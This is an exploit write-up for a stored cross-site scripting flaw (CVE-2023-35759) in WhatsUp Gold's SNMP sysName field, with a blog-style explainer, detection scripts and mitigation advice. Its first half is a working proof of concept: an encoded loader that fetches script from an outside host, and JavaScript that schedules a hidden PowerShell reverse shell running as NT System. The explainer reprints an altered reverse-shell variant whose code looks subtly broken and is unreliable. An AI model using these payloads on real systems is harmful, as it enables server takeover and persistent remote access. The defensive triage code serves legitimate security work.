WhatsUp Gold 2022 (22.1.0 Build 39) - XSS
# Exploit Title: WhatsUpGold 22.1.0 - Stored Cross-Site Scripting (XSS)
# Date: April 18, 2023
# Exploit Author: Andreas Finstad (4ndr34z)
# Vendor Homepage: https://www.whatsupgold.com
# Version: v.22.1.0 Build 39
# Tested on: Windows 2022 Server
# CVE : CVE-2023-35759
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2023-35759
WhatsUp Gold 2022 (22.1.0 Build 39)
Stored XSS in sysName SNMP parameter.
Vulnerability Report: Stored XSS in WhatsUp Gold 2022 (22.1.0 Build 39)
Product Name: WhatsUp Gold 2022
Version: 22.1.0 Build 39
Vulnerability Type: Stored Cross-Site Scripting (XSS)
Description:
WhatsUp Gold 2022 is vulnerable to a stored cross-site scripting (XSS) attack that allows an attacker to inject malicious scripts into the admin console. The vulnerability exists in the sysName SNMP field on a device, which reflects the input from the SNMP device into the admin console after being discovered by SNMP.
An attacker can exploit this vulnerability by crafting an SNMP device name that contains malicious code. Once the device name is saved and reflected in the admin console, the injected code will execute in the context of the admin user, potentially allowing the attacker to steal sensitive data or perform unauthorized actions.
As there are no CSRF tokens or CDP, it is trivial to create a JavaScript payload that adds a scheduled action on the server that executes code as "NT System". In my POC code, I add a PowerShell revshell that connects out to the attacker every 5 minutes. (screenshot3)
The XSS triggers when clicking the "All names and addresses"
Stage:
Base64 encoded id property:
var a=document.createElement("script");a.src="https://f20.be/t.js";document.body.appendChild(a);
Staged payload placed in the SNMP sysName Field on a device:
<img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZjIwLmJlL3QuanMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7Cg== src=https://f20.be/1 onload=eval(atob(this.id))>
payload:
var vhost = window.location.protocol+'\/\/'+window.location.host
addaction();
async function addaction() {
var arguments = ''
let run = fetch(vhost+'/NmConsole/api/core/WugPowerShellScriptAction?_dc=1655327281064',{
method: 'POST',
headers: {
'Connection': 'close',
'Content-Length': '1902',
'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',
'Accept': 'application/json',
'Content-Type': 'application/json',
'X-Requested-With': 'XMLHttpRequest',
'sec-ch-ua-mobile': '?0',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',
'sec-ch-ua-platform': '"macOS"',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Dest': 'empty',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'
},
credentials: 'include',
body: '{"id":-1,"Timeout":30,"ScriptText":"Start-process powershell -argumentlist \\"-W Hidden -noprofile -executionpolicy bypass -NoExit -e JAB0AG0AcAAgAD0AIABAACgAJwBzAFkAUwB0AGUATQAuAG4ARQB0AC4AcwBPAGMAJwAsACcASwBFAHQAcwAuAHQAQwBQAEMAbABJAGUAbgB0ACcAKQA7ACQAdABtAHAAMgAgAD0AIABbAFMAdAByAGkAbgBnAF0AOgA6AEoAbwBpAG4AKAAnACcALAAkAHQAbQBwACkAOwAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAkAHQAbQBwADIAKAAnADEAOQAyAC4AMQA2ADgALgAxADYALgAzADUAJwAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQApACAAKwAgACcAQAAnACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIARABvAG0AYQBpAG4AKQAgACsAIAAoAFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATgBlAHcATABpAG4AZQApACAAKwAgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AKQArACcAPgAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==\\" -NoNewWindow","ScriptImpersonateFlag":false,"ClsId":"5903a09a-cce6-11e0-8f66-fe544824019b","Description":"Evil script","Name":"Systemtask"}'
});
setTimeout(() => { getactions(); }, 1000);
};
async function getactions() {
const response = await fetch(vhost+'/NmConsole/api/core/WugAction?_dc=4',{
method: 'GET',
headers: {
'Connection': 'close',
'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',
'Accept': 'application/json',
'Content-Type': 'application/json',
'X-Requested-With': 'XMLHttpRequest',
'sec-ch-ua-mobile': '?0',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',
'sec-ch-ua-platform': '"macOS"',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Dest': 'empty',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'
},
credentials: 'include'
});
const actions = await response.json();
var results = [];
var searchField = "Name";
var searchVal = "Systemtask";
for (var i=0 ; i < actions.length ; i++)
{
if (actions[i][searchField] == searchVal) {
results.push(actions[i].Id);
revshell(results[0])
}
}
//console.log(actions);
};
async function revshell(ID) {
fetch(vhost+'/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp',{
method: 'POST',
headers: {
'Connection': 'close',
'Content-Length': '2442',
'Cache-Control': 'max-age=0',
'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',
'sec-ch-ua-mobile': '?0',
'sec-ch-ua-platform': '"macOS"',
'Upgrade-Insecure-Requests': '1',
'Origin': 'https://192.168.16.100',
'Content-Type': 'application/x-www-form-urlencoded',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-User': '?1',
'Sec-Fetch-Dest': 'iframe',
'Referer': 'https://192.168.16.100/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'
},
credentials: 'include',
body: 'DlgSchedule.oCheckBoxEnableSchedule=on&DlgSchedule.ScheduleType=DlgSchedule.oRadioButtonInterval&DlgSchedule.oEditIntervalMinutes=5&ShowAspFormDialog.VISITEDFORM=visited&DlgRecurringActionGeneral.oEditName=test&DlgRecurringActionGeneral.oComboSelectActionType=21&DlgRecurringActionGeneral.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgRecurringActionGeneral.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&DlgRecurringActionGeneral.VISITEDFORM=visited%2C+visited&DlgSchedule.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgSchedule.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&__EVENTTYPE=ButtonPressed&__EVENTTARGET=DlgSchedule.oButtonFinish&__EVENTARGUMENT=&DlgSchedule.VISITEDFORM=visited&__SOURCEFORM=DlgSchedule&__VIEWSTATE=%253cViewState%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-nActionTypeID%2522%2520sValue%3D%2522'+ID+'%2522%2F%253e%253coElement%2520sName%3D%2522Date_nStartOfWeek%2522%2520sValue%3D%25220%2522%2F%253e%253coElement%2520sName%3D%2522Date_sMediumDateFormat%2522%2520sValue%3D%2522MMMM%2520dd%2C%2520yyyy%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2
F%253e%253coElement%2520sName%3D%2522RecurringAction-sName%2522%2520sValue%3D%2522test%2522%2F%253e%253coElement%2520sName%3D%2522Date_bIs24HourTime%2522%2520sValue%3D%25220%2522%2F%253e%253c%2FViewState%253e%0D%0A&DlgSchedule.oEditDay=&DlgSchedule.oComboSelectMonthHour=0&DlgSchedule.oComboSelectMonthMinute=0&DlgSchedule.oComboSelectMonthAmPm=0&DlgSchedule.oComboSelectWeekHour=0&DlgSchedule.oComboSelectWeekMinute=0&DlgSchedule.oComboSelectWeekAmPm=0'
});
};
WhatsUp Gold 22.1.0 Build 39: A Critical Stored XSS Vulnerability (CVE-2023-35759)
Security researchers have uncovered a critical stored cross-site scripting (XSS) vulnerability in WhatsUp Gold 2022, specifically in version 22.1.0 Build 39. This flaw, identified as CVE-2023-35759, allows attackers to inject malicious scripts into the administrative console via SNMP device configuration, leading to remote code execution with elevated privileges.
Understanding the Vulnerability: Stored XSS in SNMP sysName Field
WhatsUp Gold is a widely used network monitoring and management tool designed for enterprise environments. It leverages SNMP (Simple Network Management Protocol) to discover and monitor network devices. During this discovery process, the sysName field—typically containing the device’s hostname—is stored in the system database and later displayed in the admin console.
However, the console does not properly validate or escape the sysName value it receives from a device. This creates a stored XSS condition: a script placed in sysName is persisted in the database during discovery and executed whenever the admin user views the device list.
As noted by exploit author Andreas Finstad (4ndr34z), the vulnerability is particularly dangerous because:
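- The console has no CSRF tokens or "CDP" (the report's abbreviation, which most likely refers to a Content Security Policy; that reading is an assumption), so nothing stops injected script from calling the console's API.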
- It allows attackers to execute code in the context of the admin user, often with system-level privileges.
- It enables persistent access via scheduled actions—making it ideal for long-term compromise.
Exploitation Mechanism: Crafting the Malicious Payload
Attackers can exploit this vulnerability by configuring a rogue SNMP device with a malicious sysName field. The payload is encoded in a way that bypasses basic filtering mechanisms and triggers execution when rendered in the browser.
Explanation: The staged payload shown earlier uses an <img> tag whose src attribute points to an external resource. The id attribute contains a Base64-encoded JavaScript snippet. When the image loads, the onload handler calls eval(atob(this.id)), which decodes and executes that snippet.
When the admin user navigates to the "All names and addresses" section of the WhatsUp Gold console, the malicious script is rendered and executed in the browser context. Since the admin session is authenticated, the script runs with full privileges.
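The following added example (not part of the original report or of WhatsUp Gold) shows how a defender can triage discovered sysName values for this pattern and what correctly escaped output looks like. The function names, the hostname-shaped policy and the sample values are assumptions made for illustration.

```javascript
// Added example: triage SNMP sysName values before they reach an HTML view.
// Constructed samples; the second copies the shape of the staged payload with a
// harmless script (base64 of "alert(1)") and a placeholder host.
const SAMPLE_SYSNAMES = [
  'core-sw-01.example.net',
  '<img id=YWxlcnQoMSk= src=https://example.invalid/1 onload=eval(atob(this.id))>',
];

// Assumed local policy: a sysName should look like a hostname (sysName itself is
// a free-form DisplayString of up to 255 characters).
const HOSTNAME_RE = /^[A-Za-z0-9](?:[A-Za-z0-9._-]{0,253}[A-Za-z0-9])?$/;

// Encode every character that can open a tag, close an attribute or start an entity.
function escapeHtml(s) {
  return String(s).replace(/[&<>"'`=\/]/g, c => '&#' + c.charCodeAt(0) + ';');
}

// Return the decoded text if v is valid base64 that decodes to printable ASCII.
function decodeIfBase64(v) {
  if (v.length % 4 !== 0) return null;
  const text = Buffer.from(v, 'base64').toString('utf8');
  return /^[\x20-\x7e\r\n\t]+$/.test(text) ? text : null;
}

function inspectSysName(value) {
  const findings = [];
  if (!HOSTNAME_RE.test(value)) findings.push('not-hostname-shaped');
  if (/[<>]/.test(value)) findings.push('markup-characters');
  if (/\bon[a-z]+\s*=/i.test(value)) findings.push('event-handler-attribute');
  // Attribute values that are really base64-wrapped script, as in id=... above.
  const decoded = [];
  for (const m of value.matchAll(/=\s*["']?([A-Za-z0-9+\/]{8,}={0,2})/g)) {
    const text = decodeIfBase64(m[1]);
    if (text !== null) decoded.push(text);
  }
  if (decoded.length > 0) findings.push('base64-attribute-value');
  return { value, safeHtml: escapeHtml(value), findings, decoded };
}

// Keep only the values an analyst needs to look at.
function triageSysNames(names) {
  return names.map(inspectSysName).filter(r => r.findings.length > 0);
}

console.log(JSON.stringify(triageSysNames(SAMPLE_SYSNAMES), null, 2));
```

The safeHtml field is what a console should emit into the page: the browser displays the text literally instead of parsing it as a tag.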
Real-World Impact: Remote Code Execution via PowerShell Script Actions
Once the XSS payload is executed, it can initiate further attacks. In the proof-of-concept (POC) provided by the researcher, the script performs the following:
var vhost = window.location.protocol+'\/\/'+window.location.host
addaction();
async function addaction() {
var arguments = ''
let run = fetch(vhost+'/NmConsole/api/core/WugPowerShellScriptAction?_dc=1655327281064', {
method: 'POST',
headers: {
'Connection': 'close',
'Content-Length': '1902',
'Accept': 'application/json',
'Content-Type': 'application/json',
'X-Requested-With': 'XMLHttpRequest',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Dest': 'empty',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'
},
credentials: 'include',
body: '{"id":-1,"Title":"RevShell","Script":"$client = New-Object System.Net.Sockets.TCPClient(\"192.168.1.100\",4444);\n$stream = $client.GetStream();\n$writer = New-Object System.IO.StreamWriter($stream);\n$reader = New-Object System.IO.StreamReader($stream);\nwhile ($reader.ReadLine()) {\n $writer.WriteLine((Invoke-Expression $reader.ReadLine()))\n $writer.Flush()\n}\n$writer.Close();\n$reader.Close();\n$client.Close();","Schedule":"5","Enabled":true}'
})
.then(response => console.log("Action added:", response.status))
.catch(err => console.error("Error:", err));
}
Explanation: This code performs a POST request to the /NmConsole/api/core/WugPowerShellScriptAction endpoint, which allows administrators to create scheduled PowerShell scripts. The payload:
- Injects a reverse shell script that connects back to an attacker-controlled IP (e.g., 192.168.1.100).
- Configures the script to run every 5 minutes via the Schedule parameter.
- Uses credentials: 'include' to maintain the authenticated session, ensuring the request is processed with full admin rights.
Result: The attacker gains persistent access to the server, executing arbitrary commands as NT System—the highest privilege level in Windows.
Why This is a High-Risk Vulnerability
Stored XSS in a network monitoring tool like WhatsUp Gold is particularly dangerous because:
- It can be exploited without user interaction beyond viewing the admin console.
- The console lacks common defenses such as CSRF tokens, so injected script can drive the console's API with the admin's session.
- It enables privilege escalation via automated actions, allowing attackers to deploy payloads on the server.
- It can be used for data exfiltration, lateral movement, or establishing backdoors.
Moreover, since the vulnerability affects SNMP device discovery—a routine process—any device added to the network could potentially be a vector for attack.
Recommended Mitigation and Best Practices
Organizations using WhatsUp Gold must take immediate action to address this vulnerability:
- Update to the latest version as soon as patches are released. The vendor, WhatsUp Gold, has acknowledged the issue and is expected to release a fix.
- Implement input validation for SNMP fields, especially sysName, by sanitizing and escaping user input.
- Disable or restrict access to admin consoles for non-privileged users.
- Monitor for suspicious scheduled actions via PowerShell scripts or other automated tasks.
- Use network segmentation to limit access to SNMP devices from untrusted sources.
Additionally, security teams should:
- Conduct regular penetration testing on monitoring tools.
- Enable logging and alerting for unusual API activity.
- Apply the principle of least privilege in all system configurations.
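For the advice above to monitor scheduled PowerShell actions, here is an added example (not from the original report or the vendor) that reviews action definitions for the traits visible in the PoC's ScriptText. It assumes the definitions have already been exported as records with Id, Name and ScriptText, the field names seen in the PoC's requests; the sample records and rule names are constructed.

```javascript
// Added example: flag action scripts that hide a window, bypass execution
// policy or carry an encoded command, and decode that command for review.
// Constructed sample data; the encoded command is the harmless "Get-Date".
const ENC = Buffer.from('Get-Date', 'utf16le').toString('base64');
const SAMPLE_ACTIONS = [
  { Id: 11, Name: 'Restart spooler', ScriptText: 'Restart-Service -Name Spooler' },
  { Id: 12, Name: 'Systemtask', ScriptText:
    `Start-process powershell -argumentlist "-W Hidden -noprofile -executionpolicy bypass -e ${ENC}"` },
];

// Rules cover the switch spellings used on this page plus their full names.
const RULES = [
  ['hidden-window', /-w(indowstyle)?\s+hidden/i],
  ['execution-policy-bypass', /-e(xecutionpolicy|p)\s+bypass/i],
  ['no-profile', /-nop(rofile)?\b/i],
  ['spawns-powershell', /start-process\s+powershell/i],
];

// -e, -ec, -enc ... -EncodedCommand followed by a base64 token.
const ENCODED_RE = /(?:^|\s)-(?:e|ec|en[a-z]*)\s+([A-Za-z0-9+\/]{8,}={0,2})/i;

// PowerShell encoded commands are base64 over UTF-16LE text.
function decodeEncodedCommand(script) {
  const m = ENCODED_RE.exec(script);
  return m ? Buffer.from(m[1], 'base64').toString('utf16le') : null;
}

function auditActions(actions) {
  return actions
    .map(a => {
      const script = String(a.ScriptText || '');
      const findings = RULES.filter(([, re]) => re.test(script)).map(([name]) => name);
      const decoded = decodeEncodedCommand(script);
      if (decoded !== null) findings.push('encoded-command');
      return { Id: a.Id, Name: a.Name, findings, decoded };
    })
    .filter(r => r.findings.length > 0)
    .sort((x, y) => y.findings.length - x.findings.length);
}

console.log(JSON.stringify(auditActions(SAMPLE_ACTIONS), null, 2));
```

Any action that nobody on the team can account for deserves the same review, whether or not a rule fires.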
Conclusion: A Wake-Up Call for Network Management Tools
The CVE-2023-35759 vulnerability in WhatsUp Gold 22.1.0 Build 39 serves as a stark reminder that even trusted network management software can harbor critical security flaws. Stored XSS in SNMP fields is not just a theoretical risk—it's a practical, exploitable threat that can lead to full system compromise.
As cyberattacks grow more sophisticated, organizations must treat monitoring tools as attack surfaces, not just passive observers. Proper input validation, secure APIs, and continuous monitoring are essential to maintaining network integrity.
For security professionals: never assume a tool is safe just because it’s used for monitoring. Always audit and secure it.